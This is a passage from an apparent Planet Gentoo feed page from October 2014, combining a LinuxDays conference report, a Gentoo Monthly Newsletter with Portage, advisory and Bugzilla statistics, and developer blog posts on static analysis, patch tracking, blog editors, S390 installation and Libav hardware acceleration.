Place where we share/sell SWAG chat with community. People stopped by, took some stickers here and there and watched the MIPS boxie we had there. I have to admit that I screwed up with our materials a bit and we didn’t have much on the stand. I thought we have more leftover stickers/brochures, but we had just few and super plan to get Gentoo t-shirts failed me miserably…

Future possibilities

Someone from Gentoo ev. could arrive too and actually sell some stuff like cups/tshirts as we seem unable to get something working here in Czech republic. With that we would have really pretty booth. People were quite interested in our merchandise and are even willing to buy it.

Track

We had one day of talks, and basically everything went smoothly and videos will be available in near future on youtube. I will try to remember to post link here as reply when it is done (if it is not here in a week, prod me on irc because that means I forgot).

Future possibilities

We should make the thing 2 days, so it is worth for people to go to Prague, for one day I guess it is not that motivating. We should start looking for talks sooner than couple of months in advance so people can plan for it.

Overall state/possibilities

First here are photos:
http://www.root.cz/galerie/linuxdays-2014-sobota/
http://www.root.cz/galerie/linuxdays-2014-nedele/

Linuxdays people are more than happy to provide us with the room if we have the content. Most of the people attending to the conference speak english, so even tho quite parts of the tracks are czech, we can talk with the people around. We could do it yearly/bi-yearly, my take would be to create 2 days miniconf each two year, so next one could be done 2016 unless of course you want it next year again and tell me right now

Gentoo Developer Moves

Summary

Gentoo is made up of 242 active developers, of which 43 are currently away.
Gentoo has recruited a total of 803 developers since its inception.

Changes

  • Chris Reffett joined the Wiki team
  • Alex Brandt joined the Python and OpenStack teams
  • Brian Evans joined the PHP team
  • Alec Warner left the ComRel and Infrastructure teams
  • Michał Górny left the Portage team
  • Denis Dupeyron left the ComRel team
  • Robin H. Johnson left the ComRel team

Portage

This section summarizes the current state of the portage tree.

Architectures 45
Categories 162
Packages 17722
Ebuilds 37899
Architecture Stable Testing Total % of Packages
alpha 3661 582 4243 23.94%
amd64 10915 6318 17233 97.24%
amd64-fbsd 0 1573 1573 8.88%
arm 2701 1773 4474 25.25%
arm64 569 34 603 3.40%
hppa 3097 490 3587 20.24%
ia64 3213 627 3840 21.67%
m68k 612 98 710 4.01%
mips 0 2419 2419 13.65%
ppc 6866 2460 9326 52.62%
ppc64 4369 969 5338 30.12%
s390 1458 355 1813 10.23%
sh 1646 432 2078 11.73%
sparc 4156 916 5072 28.62%
sparc-fbsd 0 316 316 1.78%
x86 11564 5361 16925 95.50%
x86-fbsd 0 3238 3238 18.27%

gmn-portage-stats-2014-10

Security

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201409-10 app-shells/bash Bash: Code Injection (Updated fix for GLSA 201409-09) 523592
201409-09 app-shells/bash Bash: Code Injection 523592
201409-08 dev-libs/libxml2 libxml2: Denial of Service 509834
201409-07 net-proxy/c-icap c-icap: Denial of Service 455324
201409-06 www-client/chromium Chromium: Multiple vulnerabilities 522484
201409-05 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 522448
201409-04 dev-db/mysql MySQL: Multiple vulnerabilities 460748
201409-03 net-misc/dhcpcd dhcpcd: Denial of service 518596
201409-02 net-analyzer/net-snmp Net-SNMP: Denial of Service 431752
201409-01 net-analyzer/wireshark Wireshark: Multiple vulnerabilities 519014

Package Removals/Additions

Removals

Package Developer Date
dev-python/amara dev-zero 07 Sep 2014
dev-python/Bcryptor pacho 07 Sep 2014
dev-python/Yamlog pacho 07 Sep 2014
app-crypt/opencdk pacho 07 Sep 2014
net-dialup/gnome-ppp pacho 07 Sep 2014
media-plugins/vdr-dxr3 pacho 07 Sep 2014
media-video/dxr3config pacho 07 Sep 2014
media-video/em8300-libraries pacho 07 Sep 2014
media-video/em8300-modules pacho 07 Sep 2014
net-misc/xsupplicant pacho 07 Sep 2014
www-apache/mod_lisp2 pacho 07 Sep 2014
dev-python/py-gnupg pacho 07 Sep 2014
media-sound/decibel-audio-player pacho 07 Sep 2014
sys-power/gtk-cpuspeedy pacho 07 Sep 2014
app-emulation/emul-linux-x86-glibc-errno-compat pacho 07 Sep 2014
sys-fs/chironfs pacho 07 Sep 2014
net-p2p/giftui pacho 07 Sep 2014
app-misc/discomatic pacho 07 Sep 2014
x11-misc/uf-view pacho 07 Sep 2014
games-action/minetest_build hasufell 09 Sep 2014
games-action/minetest_common hasufell 09 Sep 2014
games-action/minetest_survival hasufell 09 Sep 2014
www-client/opera-next jer 15 Sep 2014
www-apps/swish-e dilfridge 19 Sep 2014
dev-qt/qcustomplot jlec 29 Sep 2014

Additions

Package Developer Date
dev-ruby/typhoeus graaff 01 Sep 2014
dev-python/toolz patrick 02 Sep 2014
dev-python/cytoolz patrick 02 Sep 2014
dev-python/unicodecsv patrick 02 Sep 2014
dev-python/characteristic idella4 02 Sep 2014
dev-python/service_identity idella4 02 Sep 2014
dev-libs/gom pacho 02 Sep 2014
games-roguelike/mazesofmonad hasufell 02 Sep 2014
dev-ruby/ast mrueg 04 Sep 2014
dev-ruby/cliver mrueg 04 Sep 2014
dev-ruby/parser mrueg 04 Sep 2014
dev-ruby/astrolabe mrueg 04 Sep 2014
net-ftp/pybootd vapier 04 Sep 2014
net-analyzer/nbwmon jer 04 Sep 2014
net-misc/megatools dlan 05 Sep 2014
dev-python/placefinder idella4 06 Sep 2014
dev-python/flask-cors idella4 09 Sep 2014
app-crypt/crackpkcs12 vapier 10 Sep 2014
dev-qt/linguist-tools pesa 11 Sep 2014
dev-qt/qdbus pesa 11 Sep 2014
dev-qt/qdoc pesa 11 Sep 2014
dev-qt/qtconcurrent pesa 11 Sep 2014
dev-qt/qtdiag pesa 11 Sep 2014
dev-qt/qtgraphicaleffects pesa 11 Sep 2014
dev-qt/qtimageformats pesa 11 Sep 2014
dev-qt/qtnetwork pesa 11 Sep 2014
dev-qt/qtpaths pesa 11 Sep 2014
dev-qt/qtprintsupport pesa 11 Sep 2014
dev-qt/qtquick1 pesa 11 Sep 2014
dev-qt/qtquickcontrols pesa 11 Sep 2014
dev-qt/qtserialport pesa 11 Sep 2014
dev-qt/qttranslations pesa 11 Sep 2014
dev-qt/qtwebsockets pesa 11 Sep 2014
dev-qt/qtwidgets pesa 11 Sep 2014
dev-qt/qtx11extras pesa 11 Sep 2014
dev-qt/qtxml pesa 11 Sep 2014
www-client/otter jer 13 Sep 2014
dev-util/pycharm-community xmw 14 Sep 2014
dev-util/pycharm-professional xmw 14 Sep 2014
media-libs/libgltf dilfridge 14 Sep 2014
www-client/opera-beta jer 15 Sep 2014
dev-libs/libbase58 blueness 15 Sep 2014
net-libs/courier-unicode hanno 16 Sep 2014
dev-libs/bareos-fastlzlib mschiff 16 Sep 2014
sys-libs/nss-usrfiles ryao 17 Sep 2014
sys-cluster/poolmon mschiff 18 Sep 2014
dev-python/pyClamd xmw 20 Sep 2014
sci-libs/htslib jlec 20 Sep 2014
dev-python/pika xarthisius 21 Sep 2014
games-rpg/wasteland2 hasufell 21 Sep 2014
app-backup/holland-lib-common alunduil 21 Sep 2014
app-backup/holland-backup-sqlite alunduil 21 Sep 2014
app-backup/holland-backup-pgdump alunduil 21 Sep 2014
app-backup/holland-backup-example alunduil 21 Sep 2014
app-backup/holland-backup-random alunduil 21 Sep 2014
app-backup/holland-lib-lvm alunduil 21 Sep 2014
app-backup/holland-lib-mysql alunduil 21 Sep 2014
app-backup/holland-backup-mysqldump alunduil 21 Sep 2014
app-backup/holland-backup-mysqlhotcopy alunduil 21 Sep 2014
app-backup/holland-backup-mysql-lvm alunduil 21 Sep 2014
app-backup/holland-backup-mysql-meta alunduil 21 Sep 2014
app-backup/holland alunduil 21 Sep 2014
net-libs/libndp pacho 22 Sep 2014
dev-python/keystonemiddleware prometheanfire 22 Sep 2014
media-libs/libbdplus beandog 22 Sep 2014
dev-python/texttable alunduil 23 Sep 2014
dev-perl/IMAP-BodyStructure chainsaw 25 Sep 2014
net-libs/uhttpmock pacho 25 Sep 2014
dev-perl/Data-Validate-IP chainsaw 25 Sep 2014
dev-perl/Data-Validate-Domain chainsaw 25 Sep 2014
dev-perl/Template-Plugin-Cycle chainsaw 25 Sep 2014
dev-perl/XML-Directory chainsaw 25 Sep 2014
dev-python/treq ryao 25 Sep 2014
dev-python/eliot ryao 25 Sep 2014
dev-python/xcffib idella4 26 Sep 2014
dev-qt/qtsensors pesa 26 Sep 2014
dev-python/path-py floppym 27 Sep 2014
dev-perl/Archive-Extract dilfridge 27 Sep 2014
dev-python/requests-mock alunduil 27 Sep 2014
dev-libs/appstream-glib eva 27 Sep 2014
dev-qt/qtpositioning pesa 28 Sep 2014
dev-qt/qcustomplot jlec 28 Sep 2014
dev-perl/Data-Structure-Util dilfridge 28 Sep 2014
dev-perl/IO-Event dilfridge 28 Sep 2014
dev-libs/qcustomplot jlec 29 Sep 2014
dev-python/webassets yngwin 30 Sep 2014
dev-python/google-apputils idella4 30 Sep 2014
dev-python/pyinsane voyageur 30 Sep 2014
dev-python/pyocr voyageur 30 Sep 2014
app-text/paperwork voyageur 30 Sep 2014

Bugzilla

The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.

Activity

The following tables and charts summarize the activity on Bugzilla between 01 September 2014 and 01 October 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.
gmn-activity-2014-10

Bug Activity Number
New 1196
Closed 769
Not fixed 175
Duplicates 136
Total 6132
Blocker 5
Critical 17
Major 66

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Security 49
2 Gentoo Linux Gnome Desktop Team 38
3 Python Gentoo Team 21
4 Qt Bug Alias 20
5 Perl Devs @ Gentoo 20
6 Gentoo KDE team 20
7 Portage team 19
8 Gentoo Games 17
9 Netmon Herd 16
10 Others 548

gmn-closed-2014-10

Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Linux bug wranglers 92
2 Gentoo Security 62
3 Gentoo Linux Gnome Desktop Team 59
4 Gentoo's Team for Core System packages 39
5 Gentoo Games 37
6 Portage team 33
7 Python Gentoo Team 32
8 Gentoo KDE team 32
9 Perl Devs @ Gentoo 27
10 Others 782

gmn-opened-2014-10

 

Tip of the month

(thanks to Thomas D. for the link to the blog post)

In case you like messing with your kernel Kconfig options to tweak the kernel image for your Gentoo boxes, you may want to know that menuconfig accepts regular expressions for searching symbols. You can start the search by typing ‘/’. For example, if you want to find all symbols ending with PCI do something like this after pressing ‘/’.

PCI$

You get a bunch of results, and then you can press the number listed on the left to jump directly to that symbol.

Related references:

http://michaelmk.blogspot.de/2014/08/jumping-directly-into-found-results-in.html

https://plus.google.com/101327154101389327284/posts/MyrhGjng1rQ

Heard in the community

Send us your favorite Gentoo script or tip at gmn@gentoo.org

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to gmn@gentoo.org.

Comments or Suggestions?

Please head over to this forum post.

October 19, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Here's a small piece of advice for all who want to upgrade their Perl to the very newest available, but still keep running an otherwise stable Gentoo installation: These three lines are exactly what needs to go into /etc/portage/package.keywords:
dev-lang/perl
virtual/perl-*
perl-core/*
Of course, as always, bugs may be present; what you get as Perl installation is called unstable or testing for a reason. We're looking forward to your reports on our bugzilla.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Lots of new challenges ahead (October 19, 2014, 14:01 UTC)

I’ve been pretty busy lately, albeit behind the corners, which leads to a lower activity within the free software communities that I’m active in. Still, I’m not planning any exit, on the contrary. Lots of ideas are just waiting for some free time to engage. So what are the challenges that have been taking up my time?

One of them is that I recently moved. And with moving comes a lot of work in getting the place into a good shape and getting settled. Today I finished the last job that I wanted to finish in my appartment in a short amount of time, so that’s one thing off my TODO list.

Another one is that I started an intensive master-after-master programme with the subject of Enterprise Architecture. This not only takes up quite some ex-cathedra time, but also additional hours of studying (and for the moment also exams). But I’m really satisfied that I can take up this course, as I’ve been wandering around in the world of enterprise architecture for some time now and want to grow even further in this field.

But that’s not all. One of my side activities has been blooming a lot, and I recently reached the 200th server that I’m administering (although I think this number will reduce to about 120 as I’m helping one organization with handing over management of their 80+ systems to their own IT staff). Together with some friends (who also have non-profit customers’ IT infrastructure management as their side-business) we’re now looking at consolidating our approach to system administration (and engineering).

I’m also looking at investing time and resources in a start-up, depending on the business plan and required efforts. But more information on this later when things are more clear :-)

October 18, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Fix ALL the BUGS! (October 18, 2014, 12:12 UTC)

Vittorio started (with some help from me) to fix all the issues pointed by Coverity.

Static analysis

Coverity (and scan-build) are quite useful to spot mistakes even if their false-positive ratio tend to be quite high. Even the false-positives are usually interesting since the spot code unnecessarily convoluted. The code should be as simple as possible but not simpler.

The basic idea behind those tools is to try to follow the code-paths while compiling them and spot what could go wrong (e.g. you are feeding a NULL to a function that would deference it).

The problems with this approach are usually two: false positive due to the limited scope of the analyzer and false negatives due shadowing.

False Positives

Coverity might assume certain inputs are valid even if they are made impossible by some initial checks up in the codeflow.

In those case you should spend enough time to make sure Coverity is not right and those faulty inputs aren’t slipping somewhere. NEVER try to just add some checks to the code pointed as first move, you might either hide issues (e.g. if Coverity complains about uninitialized variable do not just initialize it to nothing, check why it happens and if the logic behind is wrong).

If Coverity is confused, your compiler is confused as well and will produce suboptimal executables. Properly fixing those issues can result in useful speedups. Simpler code is usually faster.

Ever increasing issue count

While fixing issues using those tools you might notice to your surprise that every time you fix something, something new appears out of thin air.

This is not magic but simply that the static analyzers usually keep some limit on how deep they go depending on the issues already present and how much time had been spent already.

That surprise had been fun since apparently some of the time limit is per compilation unit so splitting large files in smaller chunks gets us more results (while speeding up the building process thanks to better parallelism).

Usually fixing some high-impact issue gets us 3 or 5 new small impact issues.

I like solving puzzles so I do not mind having more fun, sadly I did not have much spare time to play this game lately.

Merge ALL the FIXES

Fixing properly all the issues is a lofty goal and as usual having a patch is just 1/2 of the work. Usually two set of eyes work better than one and an additional brain with different expertise can prevent a good chunk of mistakes. The review process is the other, sometimes neglected, half of solving issues.

So far about 100+ patches got piled up over the past weeks and now they are sent in small batches to ease the work of review. (I have something brewing to make reviewing simpler, as you might know)

During the review what probably about 1/10 of the patches will be rejected and the relative coverity report updated with enough information to explain why it is a false positive or the dangerous or strange behaviour pointed is intentional.

The next point release for our 4 maintained major releases: 0.8, 9, 10 and 11. Many thanks to the volunteers that spend their free time keeping all the branches up to date!

Tracking patches (October 18, 2014, 11:53 UTC)

You need good tools to do a good job.

Even the best tool in the hand of a novice is a club.

I’m quite fond in improving the tools I use. And that’s why I started getting involved in Gentoo, Libav, VLC and plenty of other projects.

I already discussed about lldb and asan/valgrind, now my current focus is about patch trackers. In part it is due to the current effort to improve the libav one,

Contributors

Before talking about patches and their tracking I’d digress a little on who produces them. The mythical Contributor: without contributions an opensource project would not exist.

You might have recurring contributions and unique/seldom contributions. Both are quite important.
In general you should make so seldom contributors become recurring contributors.

A recurring contributor can accept to spend some additional time to setup the environment to actually provide its contribution back to the community, a sporadic contributor could be easily put off if the effort required to send his patch is larger than writing the patch itself.

Th project maintainers should make so the life of contributors is as simple as possible.

Patches and Revision Control

Lately most opensource projects saw the light and started to use decentralized source revision control system and thanks to github and many other is the concept of issue pull requests is getting part of our culture and with it comes hopefully a wider acceptance to the fact that the code should be reviewed before it is merged.

Pull Request

In a decentralized development scenario new code is usually developed in topic branches, routinely rebased against the master until the set is ready and then the set of changes (called series or patchset) is reviewed and after some round of fixes eventually merged. Thanks to bitbucket now we have forking, spooning and knifing as part of the jargon.

The review (and merge) step, quite properly, is called knifing (or stabbing): you have to dice, slice and polish the code before merging it.

Reviewing code

During a review bugs are usually spotted as well way to improve are suggested. Patches might be split or merged together and the series reworked and improved a lot.

The process is usually time consuming, even more for an organization made of volunteer: writing code is fun, address issues spotted is not so much, review someone else code is much less even.

Sadly it is a necessary annoyance since otherwise the errors (and horrors) that would slip through would be much bigger and probably much more. If you do not care about code quality and what you are writing is not used by other people you can probably ignore that, if you feel somehow concerned that what you wrote might turn some people life in a sea of pain. (On the other hand some gratitude for such daunting effort is usually welcome).

Pull request management

The old fashioned way to issue a pull request is either poke somebody telling that your branch is ready for merge or just make a set of patches and mail them to whoever is in charge of integrating code to the main branch.

git provides a nifty tool to do that called git send-email and is quite common to send sets of patches (called usually series) to a mailing list. You get feedback by email and you can update the set using the --in-reply-to option and the message id.

Platforms such as github and similar are more web centric and require you to use the web interface to issue and review the request. No additional tools are required beside your git and a browser.

gerrit and reviewboard provide custom scripts to setup ephemeral branches in some staging area then the review process requires a browser again. Every commit gets some tool-specific metadata to ease tracking changes across series revisions. This approach the more setup intensive.

Pro and cons

Mailing list approach

Testing patches from the mailing list is quite simple thanks to git am. And if the reply-to field is used properly updates appear sorted in a good way.

This method is the simplest for the people used to have the email client always open and a console (if they are using a well configured emacs or vim they literally do not move away from the editor).

On the other hand, people using a webmail or using a basic email client might find the approach more cumbersome than a web based one.

If your only method to track contribution is just a mailing list, gets quite easy to forget which is the status of a set. Patches could be neglected and even who wrote them might forget for a long time.

Patchwork approach

Patchwork tracks which patches hit a mailing list and tries to figure out if they are eventually merged automatically.

It is quite basic: it provides an web interface to check the status and provides a mean to just update the patch status. The review must happen in the mailing list and there is no concept of series.

As basic as it is works as a reminder about pending patches but tends to get cluttered easily and keeping it clean requires some effort.

Github approach

The web interface makes much easier spot what is pending and what’s its status, people used to have everything in the browser (chrome and mozilla could be made to work as a decent IDE lately) might like it much better.

Reviewing small series or single patches is usually nicer but the current UIs do not scale for larger (5+) patchsets.

People not living in a browser find quite annoying switch context and it requires additional effort to contribute since you have to register to a website and the process of issuing a patch requires many additional steps while in the email approach just require to type git send-email -1.

Gerrit approach

The gerrit interfaces tend to be richer than the Github counterparts. That can be good or bad since they aren’t as immediate and tend to overwhelm new contributors.

You need to make an additional effort to setup your environment since you need some custom script.

The series are tracked with additional precision, but for all the practical usage is the same as github with the additional bourden for the contributor.

Introducing plaid

Plaid is my attempt to tackle the problem. It is currently unfinished and in dire need of more hands working on it.

It’s basic concept is to be non-intrusive as much as possible, retaining all the pros of the simple git+email workflow like patchwork does.

It provides already additional features such as the ability to manage series of patches and to track updates to it. It sports a view to get a break out of which series require a review and which are pending for a long time waiting for an update.

What’s pending is adding the ability to review it directly in the browser, send the review email for the web to the mailing list and a some more.

Probably I might complete it within the year or next spring, if you like Flask or python contributions are warmly welcome!

October 17, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
My ideal editor (October 17, 2014, 19:03 UTC)

Notepad Art
Photo credit: Stephen Dann

Some of you probably read me ranting on G+ and Twitter about blog post editors. I have been complaining about that since at least last year when Typo decided to start eating my drafts. After that almost meltdown I decided to look for alternatives on writing blog posts, first with Evernote – until they decided to reset everybody's password and required you to type some content from one of your notes to be able to get the new one – and then with Google Docs.

I have indeed kept using Google Docs until recently, when it started having some issues with dead keys. Because I have been using US International layout for years, and I'm too used to it when I write English too. If I am to use a non-deadkeys keyboard, I end up adding spaces where they shouldn't be. So even if it solves it by just switching the layout, I wouldn't want to write a long text with it that way.

Then I decided to give another try to Evernote, especially as the Samsung Galaxy Note 10.1 I bought last year came with a yet-to-activate 12 months subscription to the Pro version. Not that I find anything extremely useful in it, but…

It all worked well for a while until they decided to throw me into the new Beta editor, which follows all the newest trends in blog editors. Yes because there are trends in editors now! Away goes the full-width editing, instead you have a limited-width editing space in a mostly-white canvas with disappearing interface, like node.js's Ghost and Medium and now Publify (the new name of what used to be Typo).

And here's my problem: while I understand that they try to make things that look neat and that supposedly are there to help you "focus on writing" they miss the point quite a bit with me. Indeed, rather than having a fancy editor, I think Typo needs a better drafting mechanism that does not puke on itself when you start playing with dates and other similar details.

And Evernote's new editor is not much better; indeed last week, while I was in Paris, I decided to take half an afternoon to write about libtool – mostly because J-B has been facing some issues and I wanted to document the root causes I encountered – and after two hours of heavy writing, I got to Evernote, and the note is gone. Indeed it asked me to log back in. And I logged in that same morning.

When I complained about that on Twitter, the amount of snark and backward thinking I got surprised me. I was expecting some trolling, but I had people seriously suggesting me that you should not edit things online. What? In 2014? You've got to be kidding me.

But just to make that clear, yes I have used offline editing for a while back, as Typo's editor has been overly sensible to changes too many times. But it does not scale. I'm not always on the same device, not only I have three computers in my own apartment, but I have two more at work, and then I have tablets. It is not uncommon for me to start writing on a post on one laptop, then switch to the other – for instance because I need access to the smartcard reader to read some data – or to start writing a blog post while at a conference with my work laptop, and then finish it in my room on the personal one, and so on so forth.

Yes I could use Dropbox for out-of-band synchronization, but its handling of conflicts is not great, if you end up having one of the devices offline by mistake — better than the effets of it on password syncs but not so much better. Indeed I have bad experiences with that, because it makes it too easy to start working on something completely offline, and then forget to resync it before editing it from a different service.

Other suggestions included (again) the use of statically generated blogs. I have said before that I don't care for them and I don't want to hear them as suggestions. First they suffer from the same problems stated above with working offline, and secondly they don't really support comments as first class citizens: they require services such as Disqus, Google+ or Facebook to store the comments, including it in the page as an external iframe. I not only don't like the idea of farming out the comments to a different service in general, but I would be losing too many features: search within the blog, fine-grained control over commenting (all my blog posts are open to comment, but it's filtered down with my ModSecurity rules), and I'm not even sure they would allow me to import the current set of comments.

I wonder why, instead of playing with all the CSS and JavaScript to make the interface disappear, the editors' developers don't invest time to make the drafts bulletproof. Client-side offline storage should allow for preserving data even in case of being logged out or losing network connection. I know it's not easy (or I would be writing it myself) but it shouldn't be impossible, either. Right now it seems the bling is what everybody wants to work on, rather than functionality — it probably is easier to put in your portfolio, and that could be a good explanation as any.

October 15, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into this documentary today…

https://archive.org/details/TheInternetsOwnBoyTheStoryOfAaronSwartz

October 14, 2014
Jan Kundrát a.k.a. jkt (homepage, bugs)

Some of the recent releases of Trojitá, a fast Qt e-mail client, mentioned an ongoing work towards bringing the application to the Ubuntu Touch platform. It turns out that this won't be happening.

The developers who were working on the Ubuntu Touch UI decided that they would prefer to end working with upstream and instead focus on a standalone long-term fork of Trojitá called Dekko. The fork lives within the Launchpad ecosystem and we agreed that there's no point in keeping unmaintained and dead code in our repository anymore -- hence it's being removed.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
One month in Turkey (October 14, 2014, 20:35 UTC)

Our latest roadtrip was as amazing as it was challenging because we decided that we’d spend an entire month in Turkey and use our own motorbike to get there from Paris.

Transportation

Our main idea was to spare ourselves from the long hours of road riding to Turkey so we decided from the start to use ferries to get there. Turns out that it’s pretty easy as you have to go through Italy and Greece before you set foot in Bodrum, Turkey.

  • Paris -> Nice : train
  • Nice -> Parma (IT) -> Ancona : road, (~7h drive)
  • Ancona -> Patras (GR) : ferry (21h)
  • Patras -> Piraeus (Athens) : road (~4h drive, constructions)
  • Piraeus -> Kos : ferry (~11h by night)
  • Kos -> Bodrum (TR) : ferry (1h)

Turkish customs are very friendly and polite, it’s really easy to get in with your own vehicle.

Tribute to the Nightster

This roadtrip added 6000 kms to our brave and astonishing Harley-Davidson Nightster. We encountered no problem at all with the bike even though we clearly didn’t go easy on her. We rode on gravels, dirt and mud without her complaining, not to mention the weight of our luggages and the passengers ;)

That’s why this post will be dedicated to our bike and I’ll share some of the photos I took of it during the trip. The real photos will come in some other posts.

A quick photo tour

I can’t describe well enough the pleasure and freedom feeling you get when travelling in motorbike so I hope those first photos will give you an idea.

I have to admit that it’s really impressive to leave your bike alone between the numerous trucks parking, loading/unloading their stuff a few centimeters from it.

IMG_20140905_130004

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

We arrived in Piraeus easily, time to buy tickets for the next boat to Kos.

IMG_20140906_164101  IMG_20140906_191845

 

 

 

 

 

 

Kos is quite a big island that you can discover best by … riding around !

IMG_20140907_121148

After Bodrum, where we only spent the night, you quickly discover the true nature of Turkish roads and scenery. Animals are everywhere and sometimes on the road such as those donkeys below.

IMG_20140909_180844

 

 

 

 

 

 

 

This is a view from the Bozburun bay. Two photos for two bike layouts : beach version and fully loaded version ;)

IMG_20140909_191337 IMG_20140910_112858

 

 

 

 

 

 

 

On the way to Cappadocia, near Karapinar :

IMG_20140918_142943

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

The amazing landscapes of Cappadocia, after two weeks by the sea it felt cold up there.

IMG_20140920_140433 IMG_20140920_174936 IMG_20140921_130308

 

 

 

 

 

 

 

Our last picture from the bike next to the trail leading to our favorite and lonely “private” beach on the Datça peninsula.

IMG_20140925_182326

 

 

 

 

 

 

 

 

 

 

 

 

October 13, 2014
Raúl Porcel a.k.a. armin76 (homepage, bugs)
S390 documentation in the Gentoo Wiki (October 13, 2014, 08:44 UTC)

Hi all,

One of the projects I had last year that I ended up suspending due to lack of time was S390 documentation and installation materials. For some reason there wasn’t any materials available to install Gentoo on a S390 system without having to rely in an already installed distribution.

Thanks to Marist College, IBM and Linux Foundation we were able to get two VMs for building the release materials, and thanks to Dave Jones @ V/Soft Software I was able to document the installation in a z/VM environment. Also thanks to the Debian project, since I based the materials in their procedure.

So most of the part of last year and the last few weeks I’ve been polishing and finishing the documentation I had around. So what I’ve documented: Gentoo S390 on the Hercules emulator and Gentoo S390 on z/VM. Both are based in the same pattern, since

Gentoo S390 on the Hercules emulator

This is probably the guide that will be more interesting because everyone can run the Hercules emulator, while not everyone has access to a z/VM instance. Hercules emulates an S390 system, it’s like QEMU. However QEMU, from what I can tell, is unable to emulate an S390 system in a non-S390 system, while Hercules does.

So if you want to have some fun and emulate a S390 machine in your computer, and install and use Gentoo in it, then follow the guide: https://wiki.gentoo.org/wiki/S390/Hercules

Gentoo S390 on z/VM

For those that have access to z/VM and want to install Gentoo, the guide explains all the steps needed to get a Gentoo System working. Thanks to Dave Jones I was able to create the guide and test the release materials, he even did a presentation in the 2013 VM Workshop! Link to the PDF . Keep in mind that some of the instructions given there are now outdated, mainly the links.

The link to the documentation is: https://wiki.gentoo.org/wiki/S390/Install

I have also written some tips and tricks for z/VM: https://wiki.gentoo.org/wiki/S390/z/VM_tips_and_tricks They’re really basic and were the ones I needed for creating the guide.

Installation materials

Lastly, we already had the autobuilds stage3 for s390, but we lacked the boot environment for installing Gentoo. This boot environment/release material is simply a kernel and a initramfs built with Gentoo’s genkernel based in busybox. It builds an environment using busybox like the livecd in amd64/x86 or other architectures. I’ve integrated the build of these boot environment with the autobuilds, so each week there should be an updated installation environment.

Have fun!


October 11, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
VDD14 Discussions: HWAccel2 (October 11, 2014, 14:47 UTC)

I took part to the Videolan Dev Days 14 weeks ago, sadly I had been too busy so the posts about it will appear in scattered order and sort of delayed.

Hardware acceleration

In multimedia, video is basically crunching numbers and get pixels or crunching pixels and getting numbers. Most of the operation are quite time consuming on a general purpose CPU and orders of magnitude faster if done using DSP or hardware designed for that purpose.

Availability

Most of the commonly used system have video decoding and encoding capabilities either embedded in the GPU or in separated hardware. Leveraging it spares lots of cpu cycles and lots of battery if we are thinking about mobile.

Capabilities

The usually specialized hardware has the issue of being inflexible and that does clash with the fact most codec evolve quite quickly with additional profiles to extend its capabilities, support different color spaces, use additional encoding strategies and such. Software decoders and encoders are still needed and need badly.

Hardware acceleration support in Libav

HWAccel 1

The hardware acceleration support in Libav grew (like other eldritch-horror tentacular code we have lurking from our dark past) without much direction addressing short term problems and not really documenting how to use it.

As result all the people that dared to use it had to guess, usually used internal symbols that they wouldn’t have to use and all in all had to spend lots of time and
had enough grief when such internals changed.

Usage

Every backend required a quite large deal of boilerplate code to initialize the backend-specific context and to render the hardware surface wrapped in the AVFrame.

The Libav backend interface was quite vague in itself, requiring to override get_format and get_buffer in some ways.

Overall to get the whole thing working the library user was supposed to do about 75% of the work. Not really nice considering people uses libraries to abstract complexity and avoid repetition

Backend support

As that support was written with just slice-based decoder in mind, it expects that all the backend would require the software decoder to parse the bitstream, prepare slices of the frame and feed the backend with them.

Sadly new backends appeared and they take directly either bitstream or full frames, the approach had been just to take the slice, add back the bitstream markers the backend library expects and be done with that.

Initial HWAccel 2 discussion

Last year since the number of backends I wanted to support were all bitstream-oriented and not fitting the mode at all I started thinking about it and the topic got discussed a bit during VDD 13. Some people that spent their dear time getting hwaccel1 working with their software were quite wary of radical changes so a path of incremental improvements got more or less put down.

HWAccel 1.2

  • default functions to allocate and free the backend context and make the struct to interface between Libav and the backend extensible without causing breakage.
  • avconv now can use some hwaccel, providing at least an example on how to use them and a mean to test without having to gut VLC or mpv to experiment.
  • document better the old-style hwaccels so at least some mistakes could be avoided (and some code that happen to work by sheer look won’t break once the faulty assuptions cease to exist)

The new VDA backend and the update VDPAU backend are examples of it.

HWAccel 1.3

  • extend the callback system to fit decently bitstream oriented backends.
  • provide an example of backend directly providing normal AVFrames.

The Intel QSV backend is used as a testbed for hwaccel 1.3.

The future of HWAccel2

Another year, another meeting. We sat down again to figure out how to get further closer to the end result of not having the casual users write boilerplate code to use hwaccel to get at least some performance boost and yet let the power users have the full access to the underpinnings so they can get most of it without having to write everything from scratch.

Simplified usage, hopefully really simple

The user just needs to use AVOption to set specific keys such as hwaccel and optionally hwaccel-device and the library will take care of everything. The frames returned by avcodec_decode_video2 will contain normal system memory and commonly used pixel formats. No further special code will be needed.

Advanced usage, now properly abstracted

All the default initialization, memory/surface allocation and such will remain overridable, with the difference that an additional callback called get_hw_surface will be introduced to separate completely the hwaccel path from the software path and specific functions to hand over the ownership of backend contexts and surfaces will be provided.

The software fallback won’t be anymore automagic in this case, but a specific AVERROR_INPUT_CHANGED will be returned so would be cleaner for the user reset the decoder without losing the display that maybe was sharing the same context. This leads the way to a simpler mean to support multiple hwaccel backends and fall back from one to the other to eventually the software decoding.

Migration path

We try our best to help people move to the new APIs.

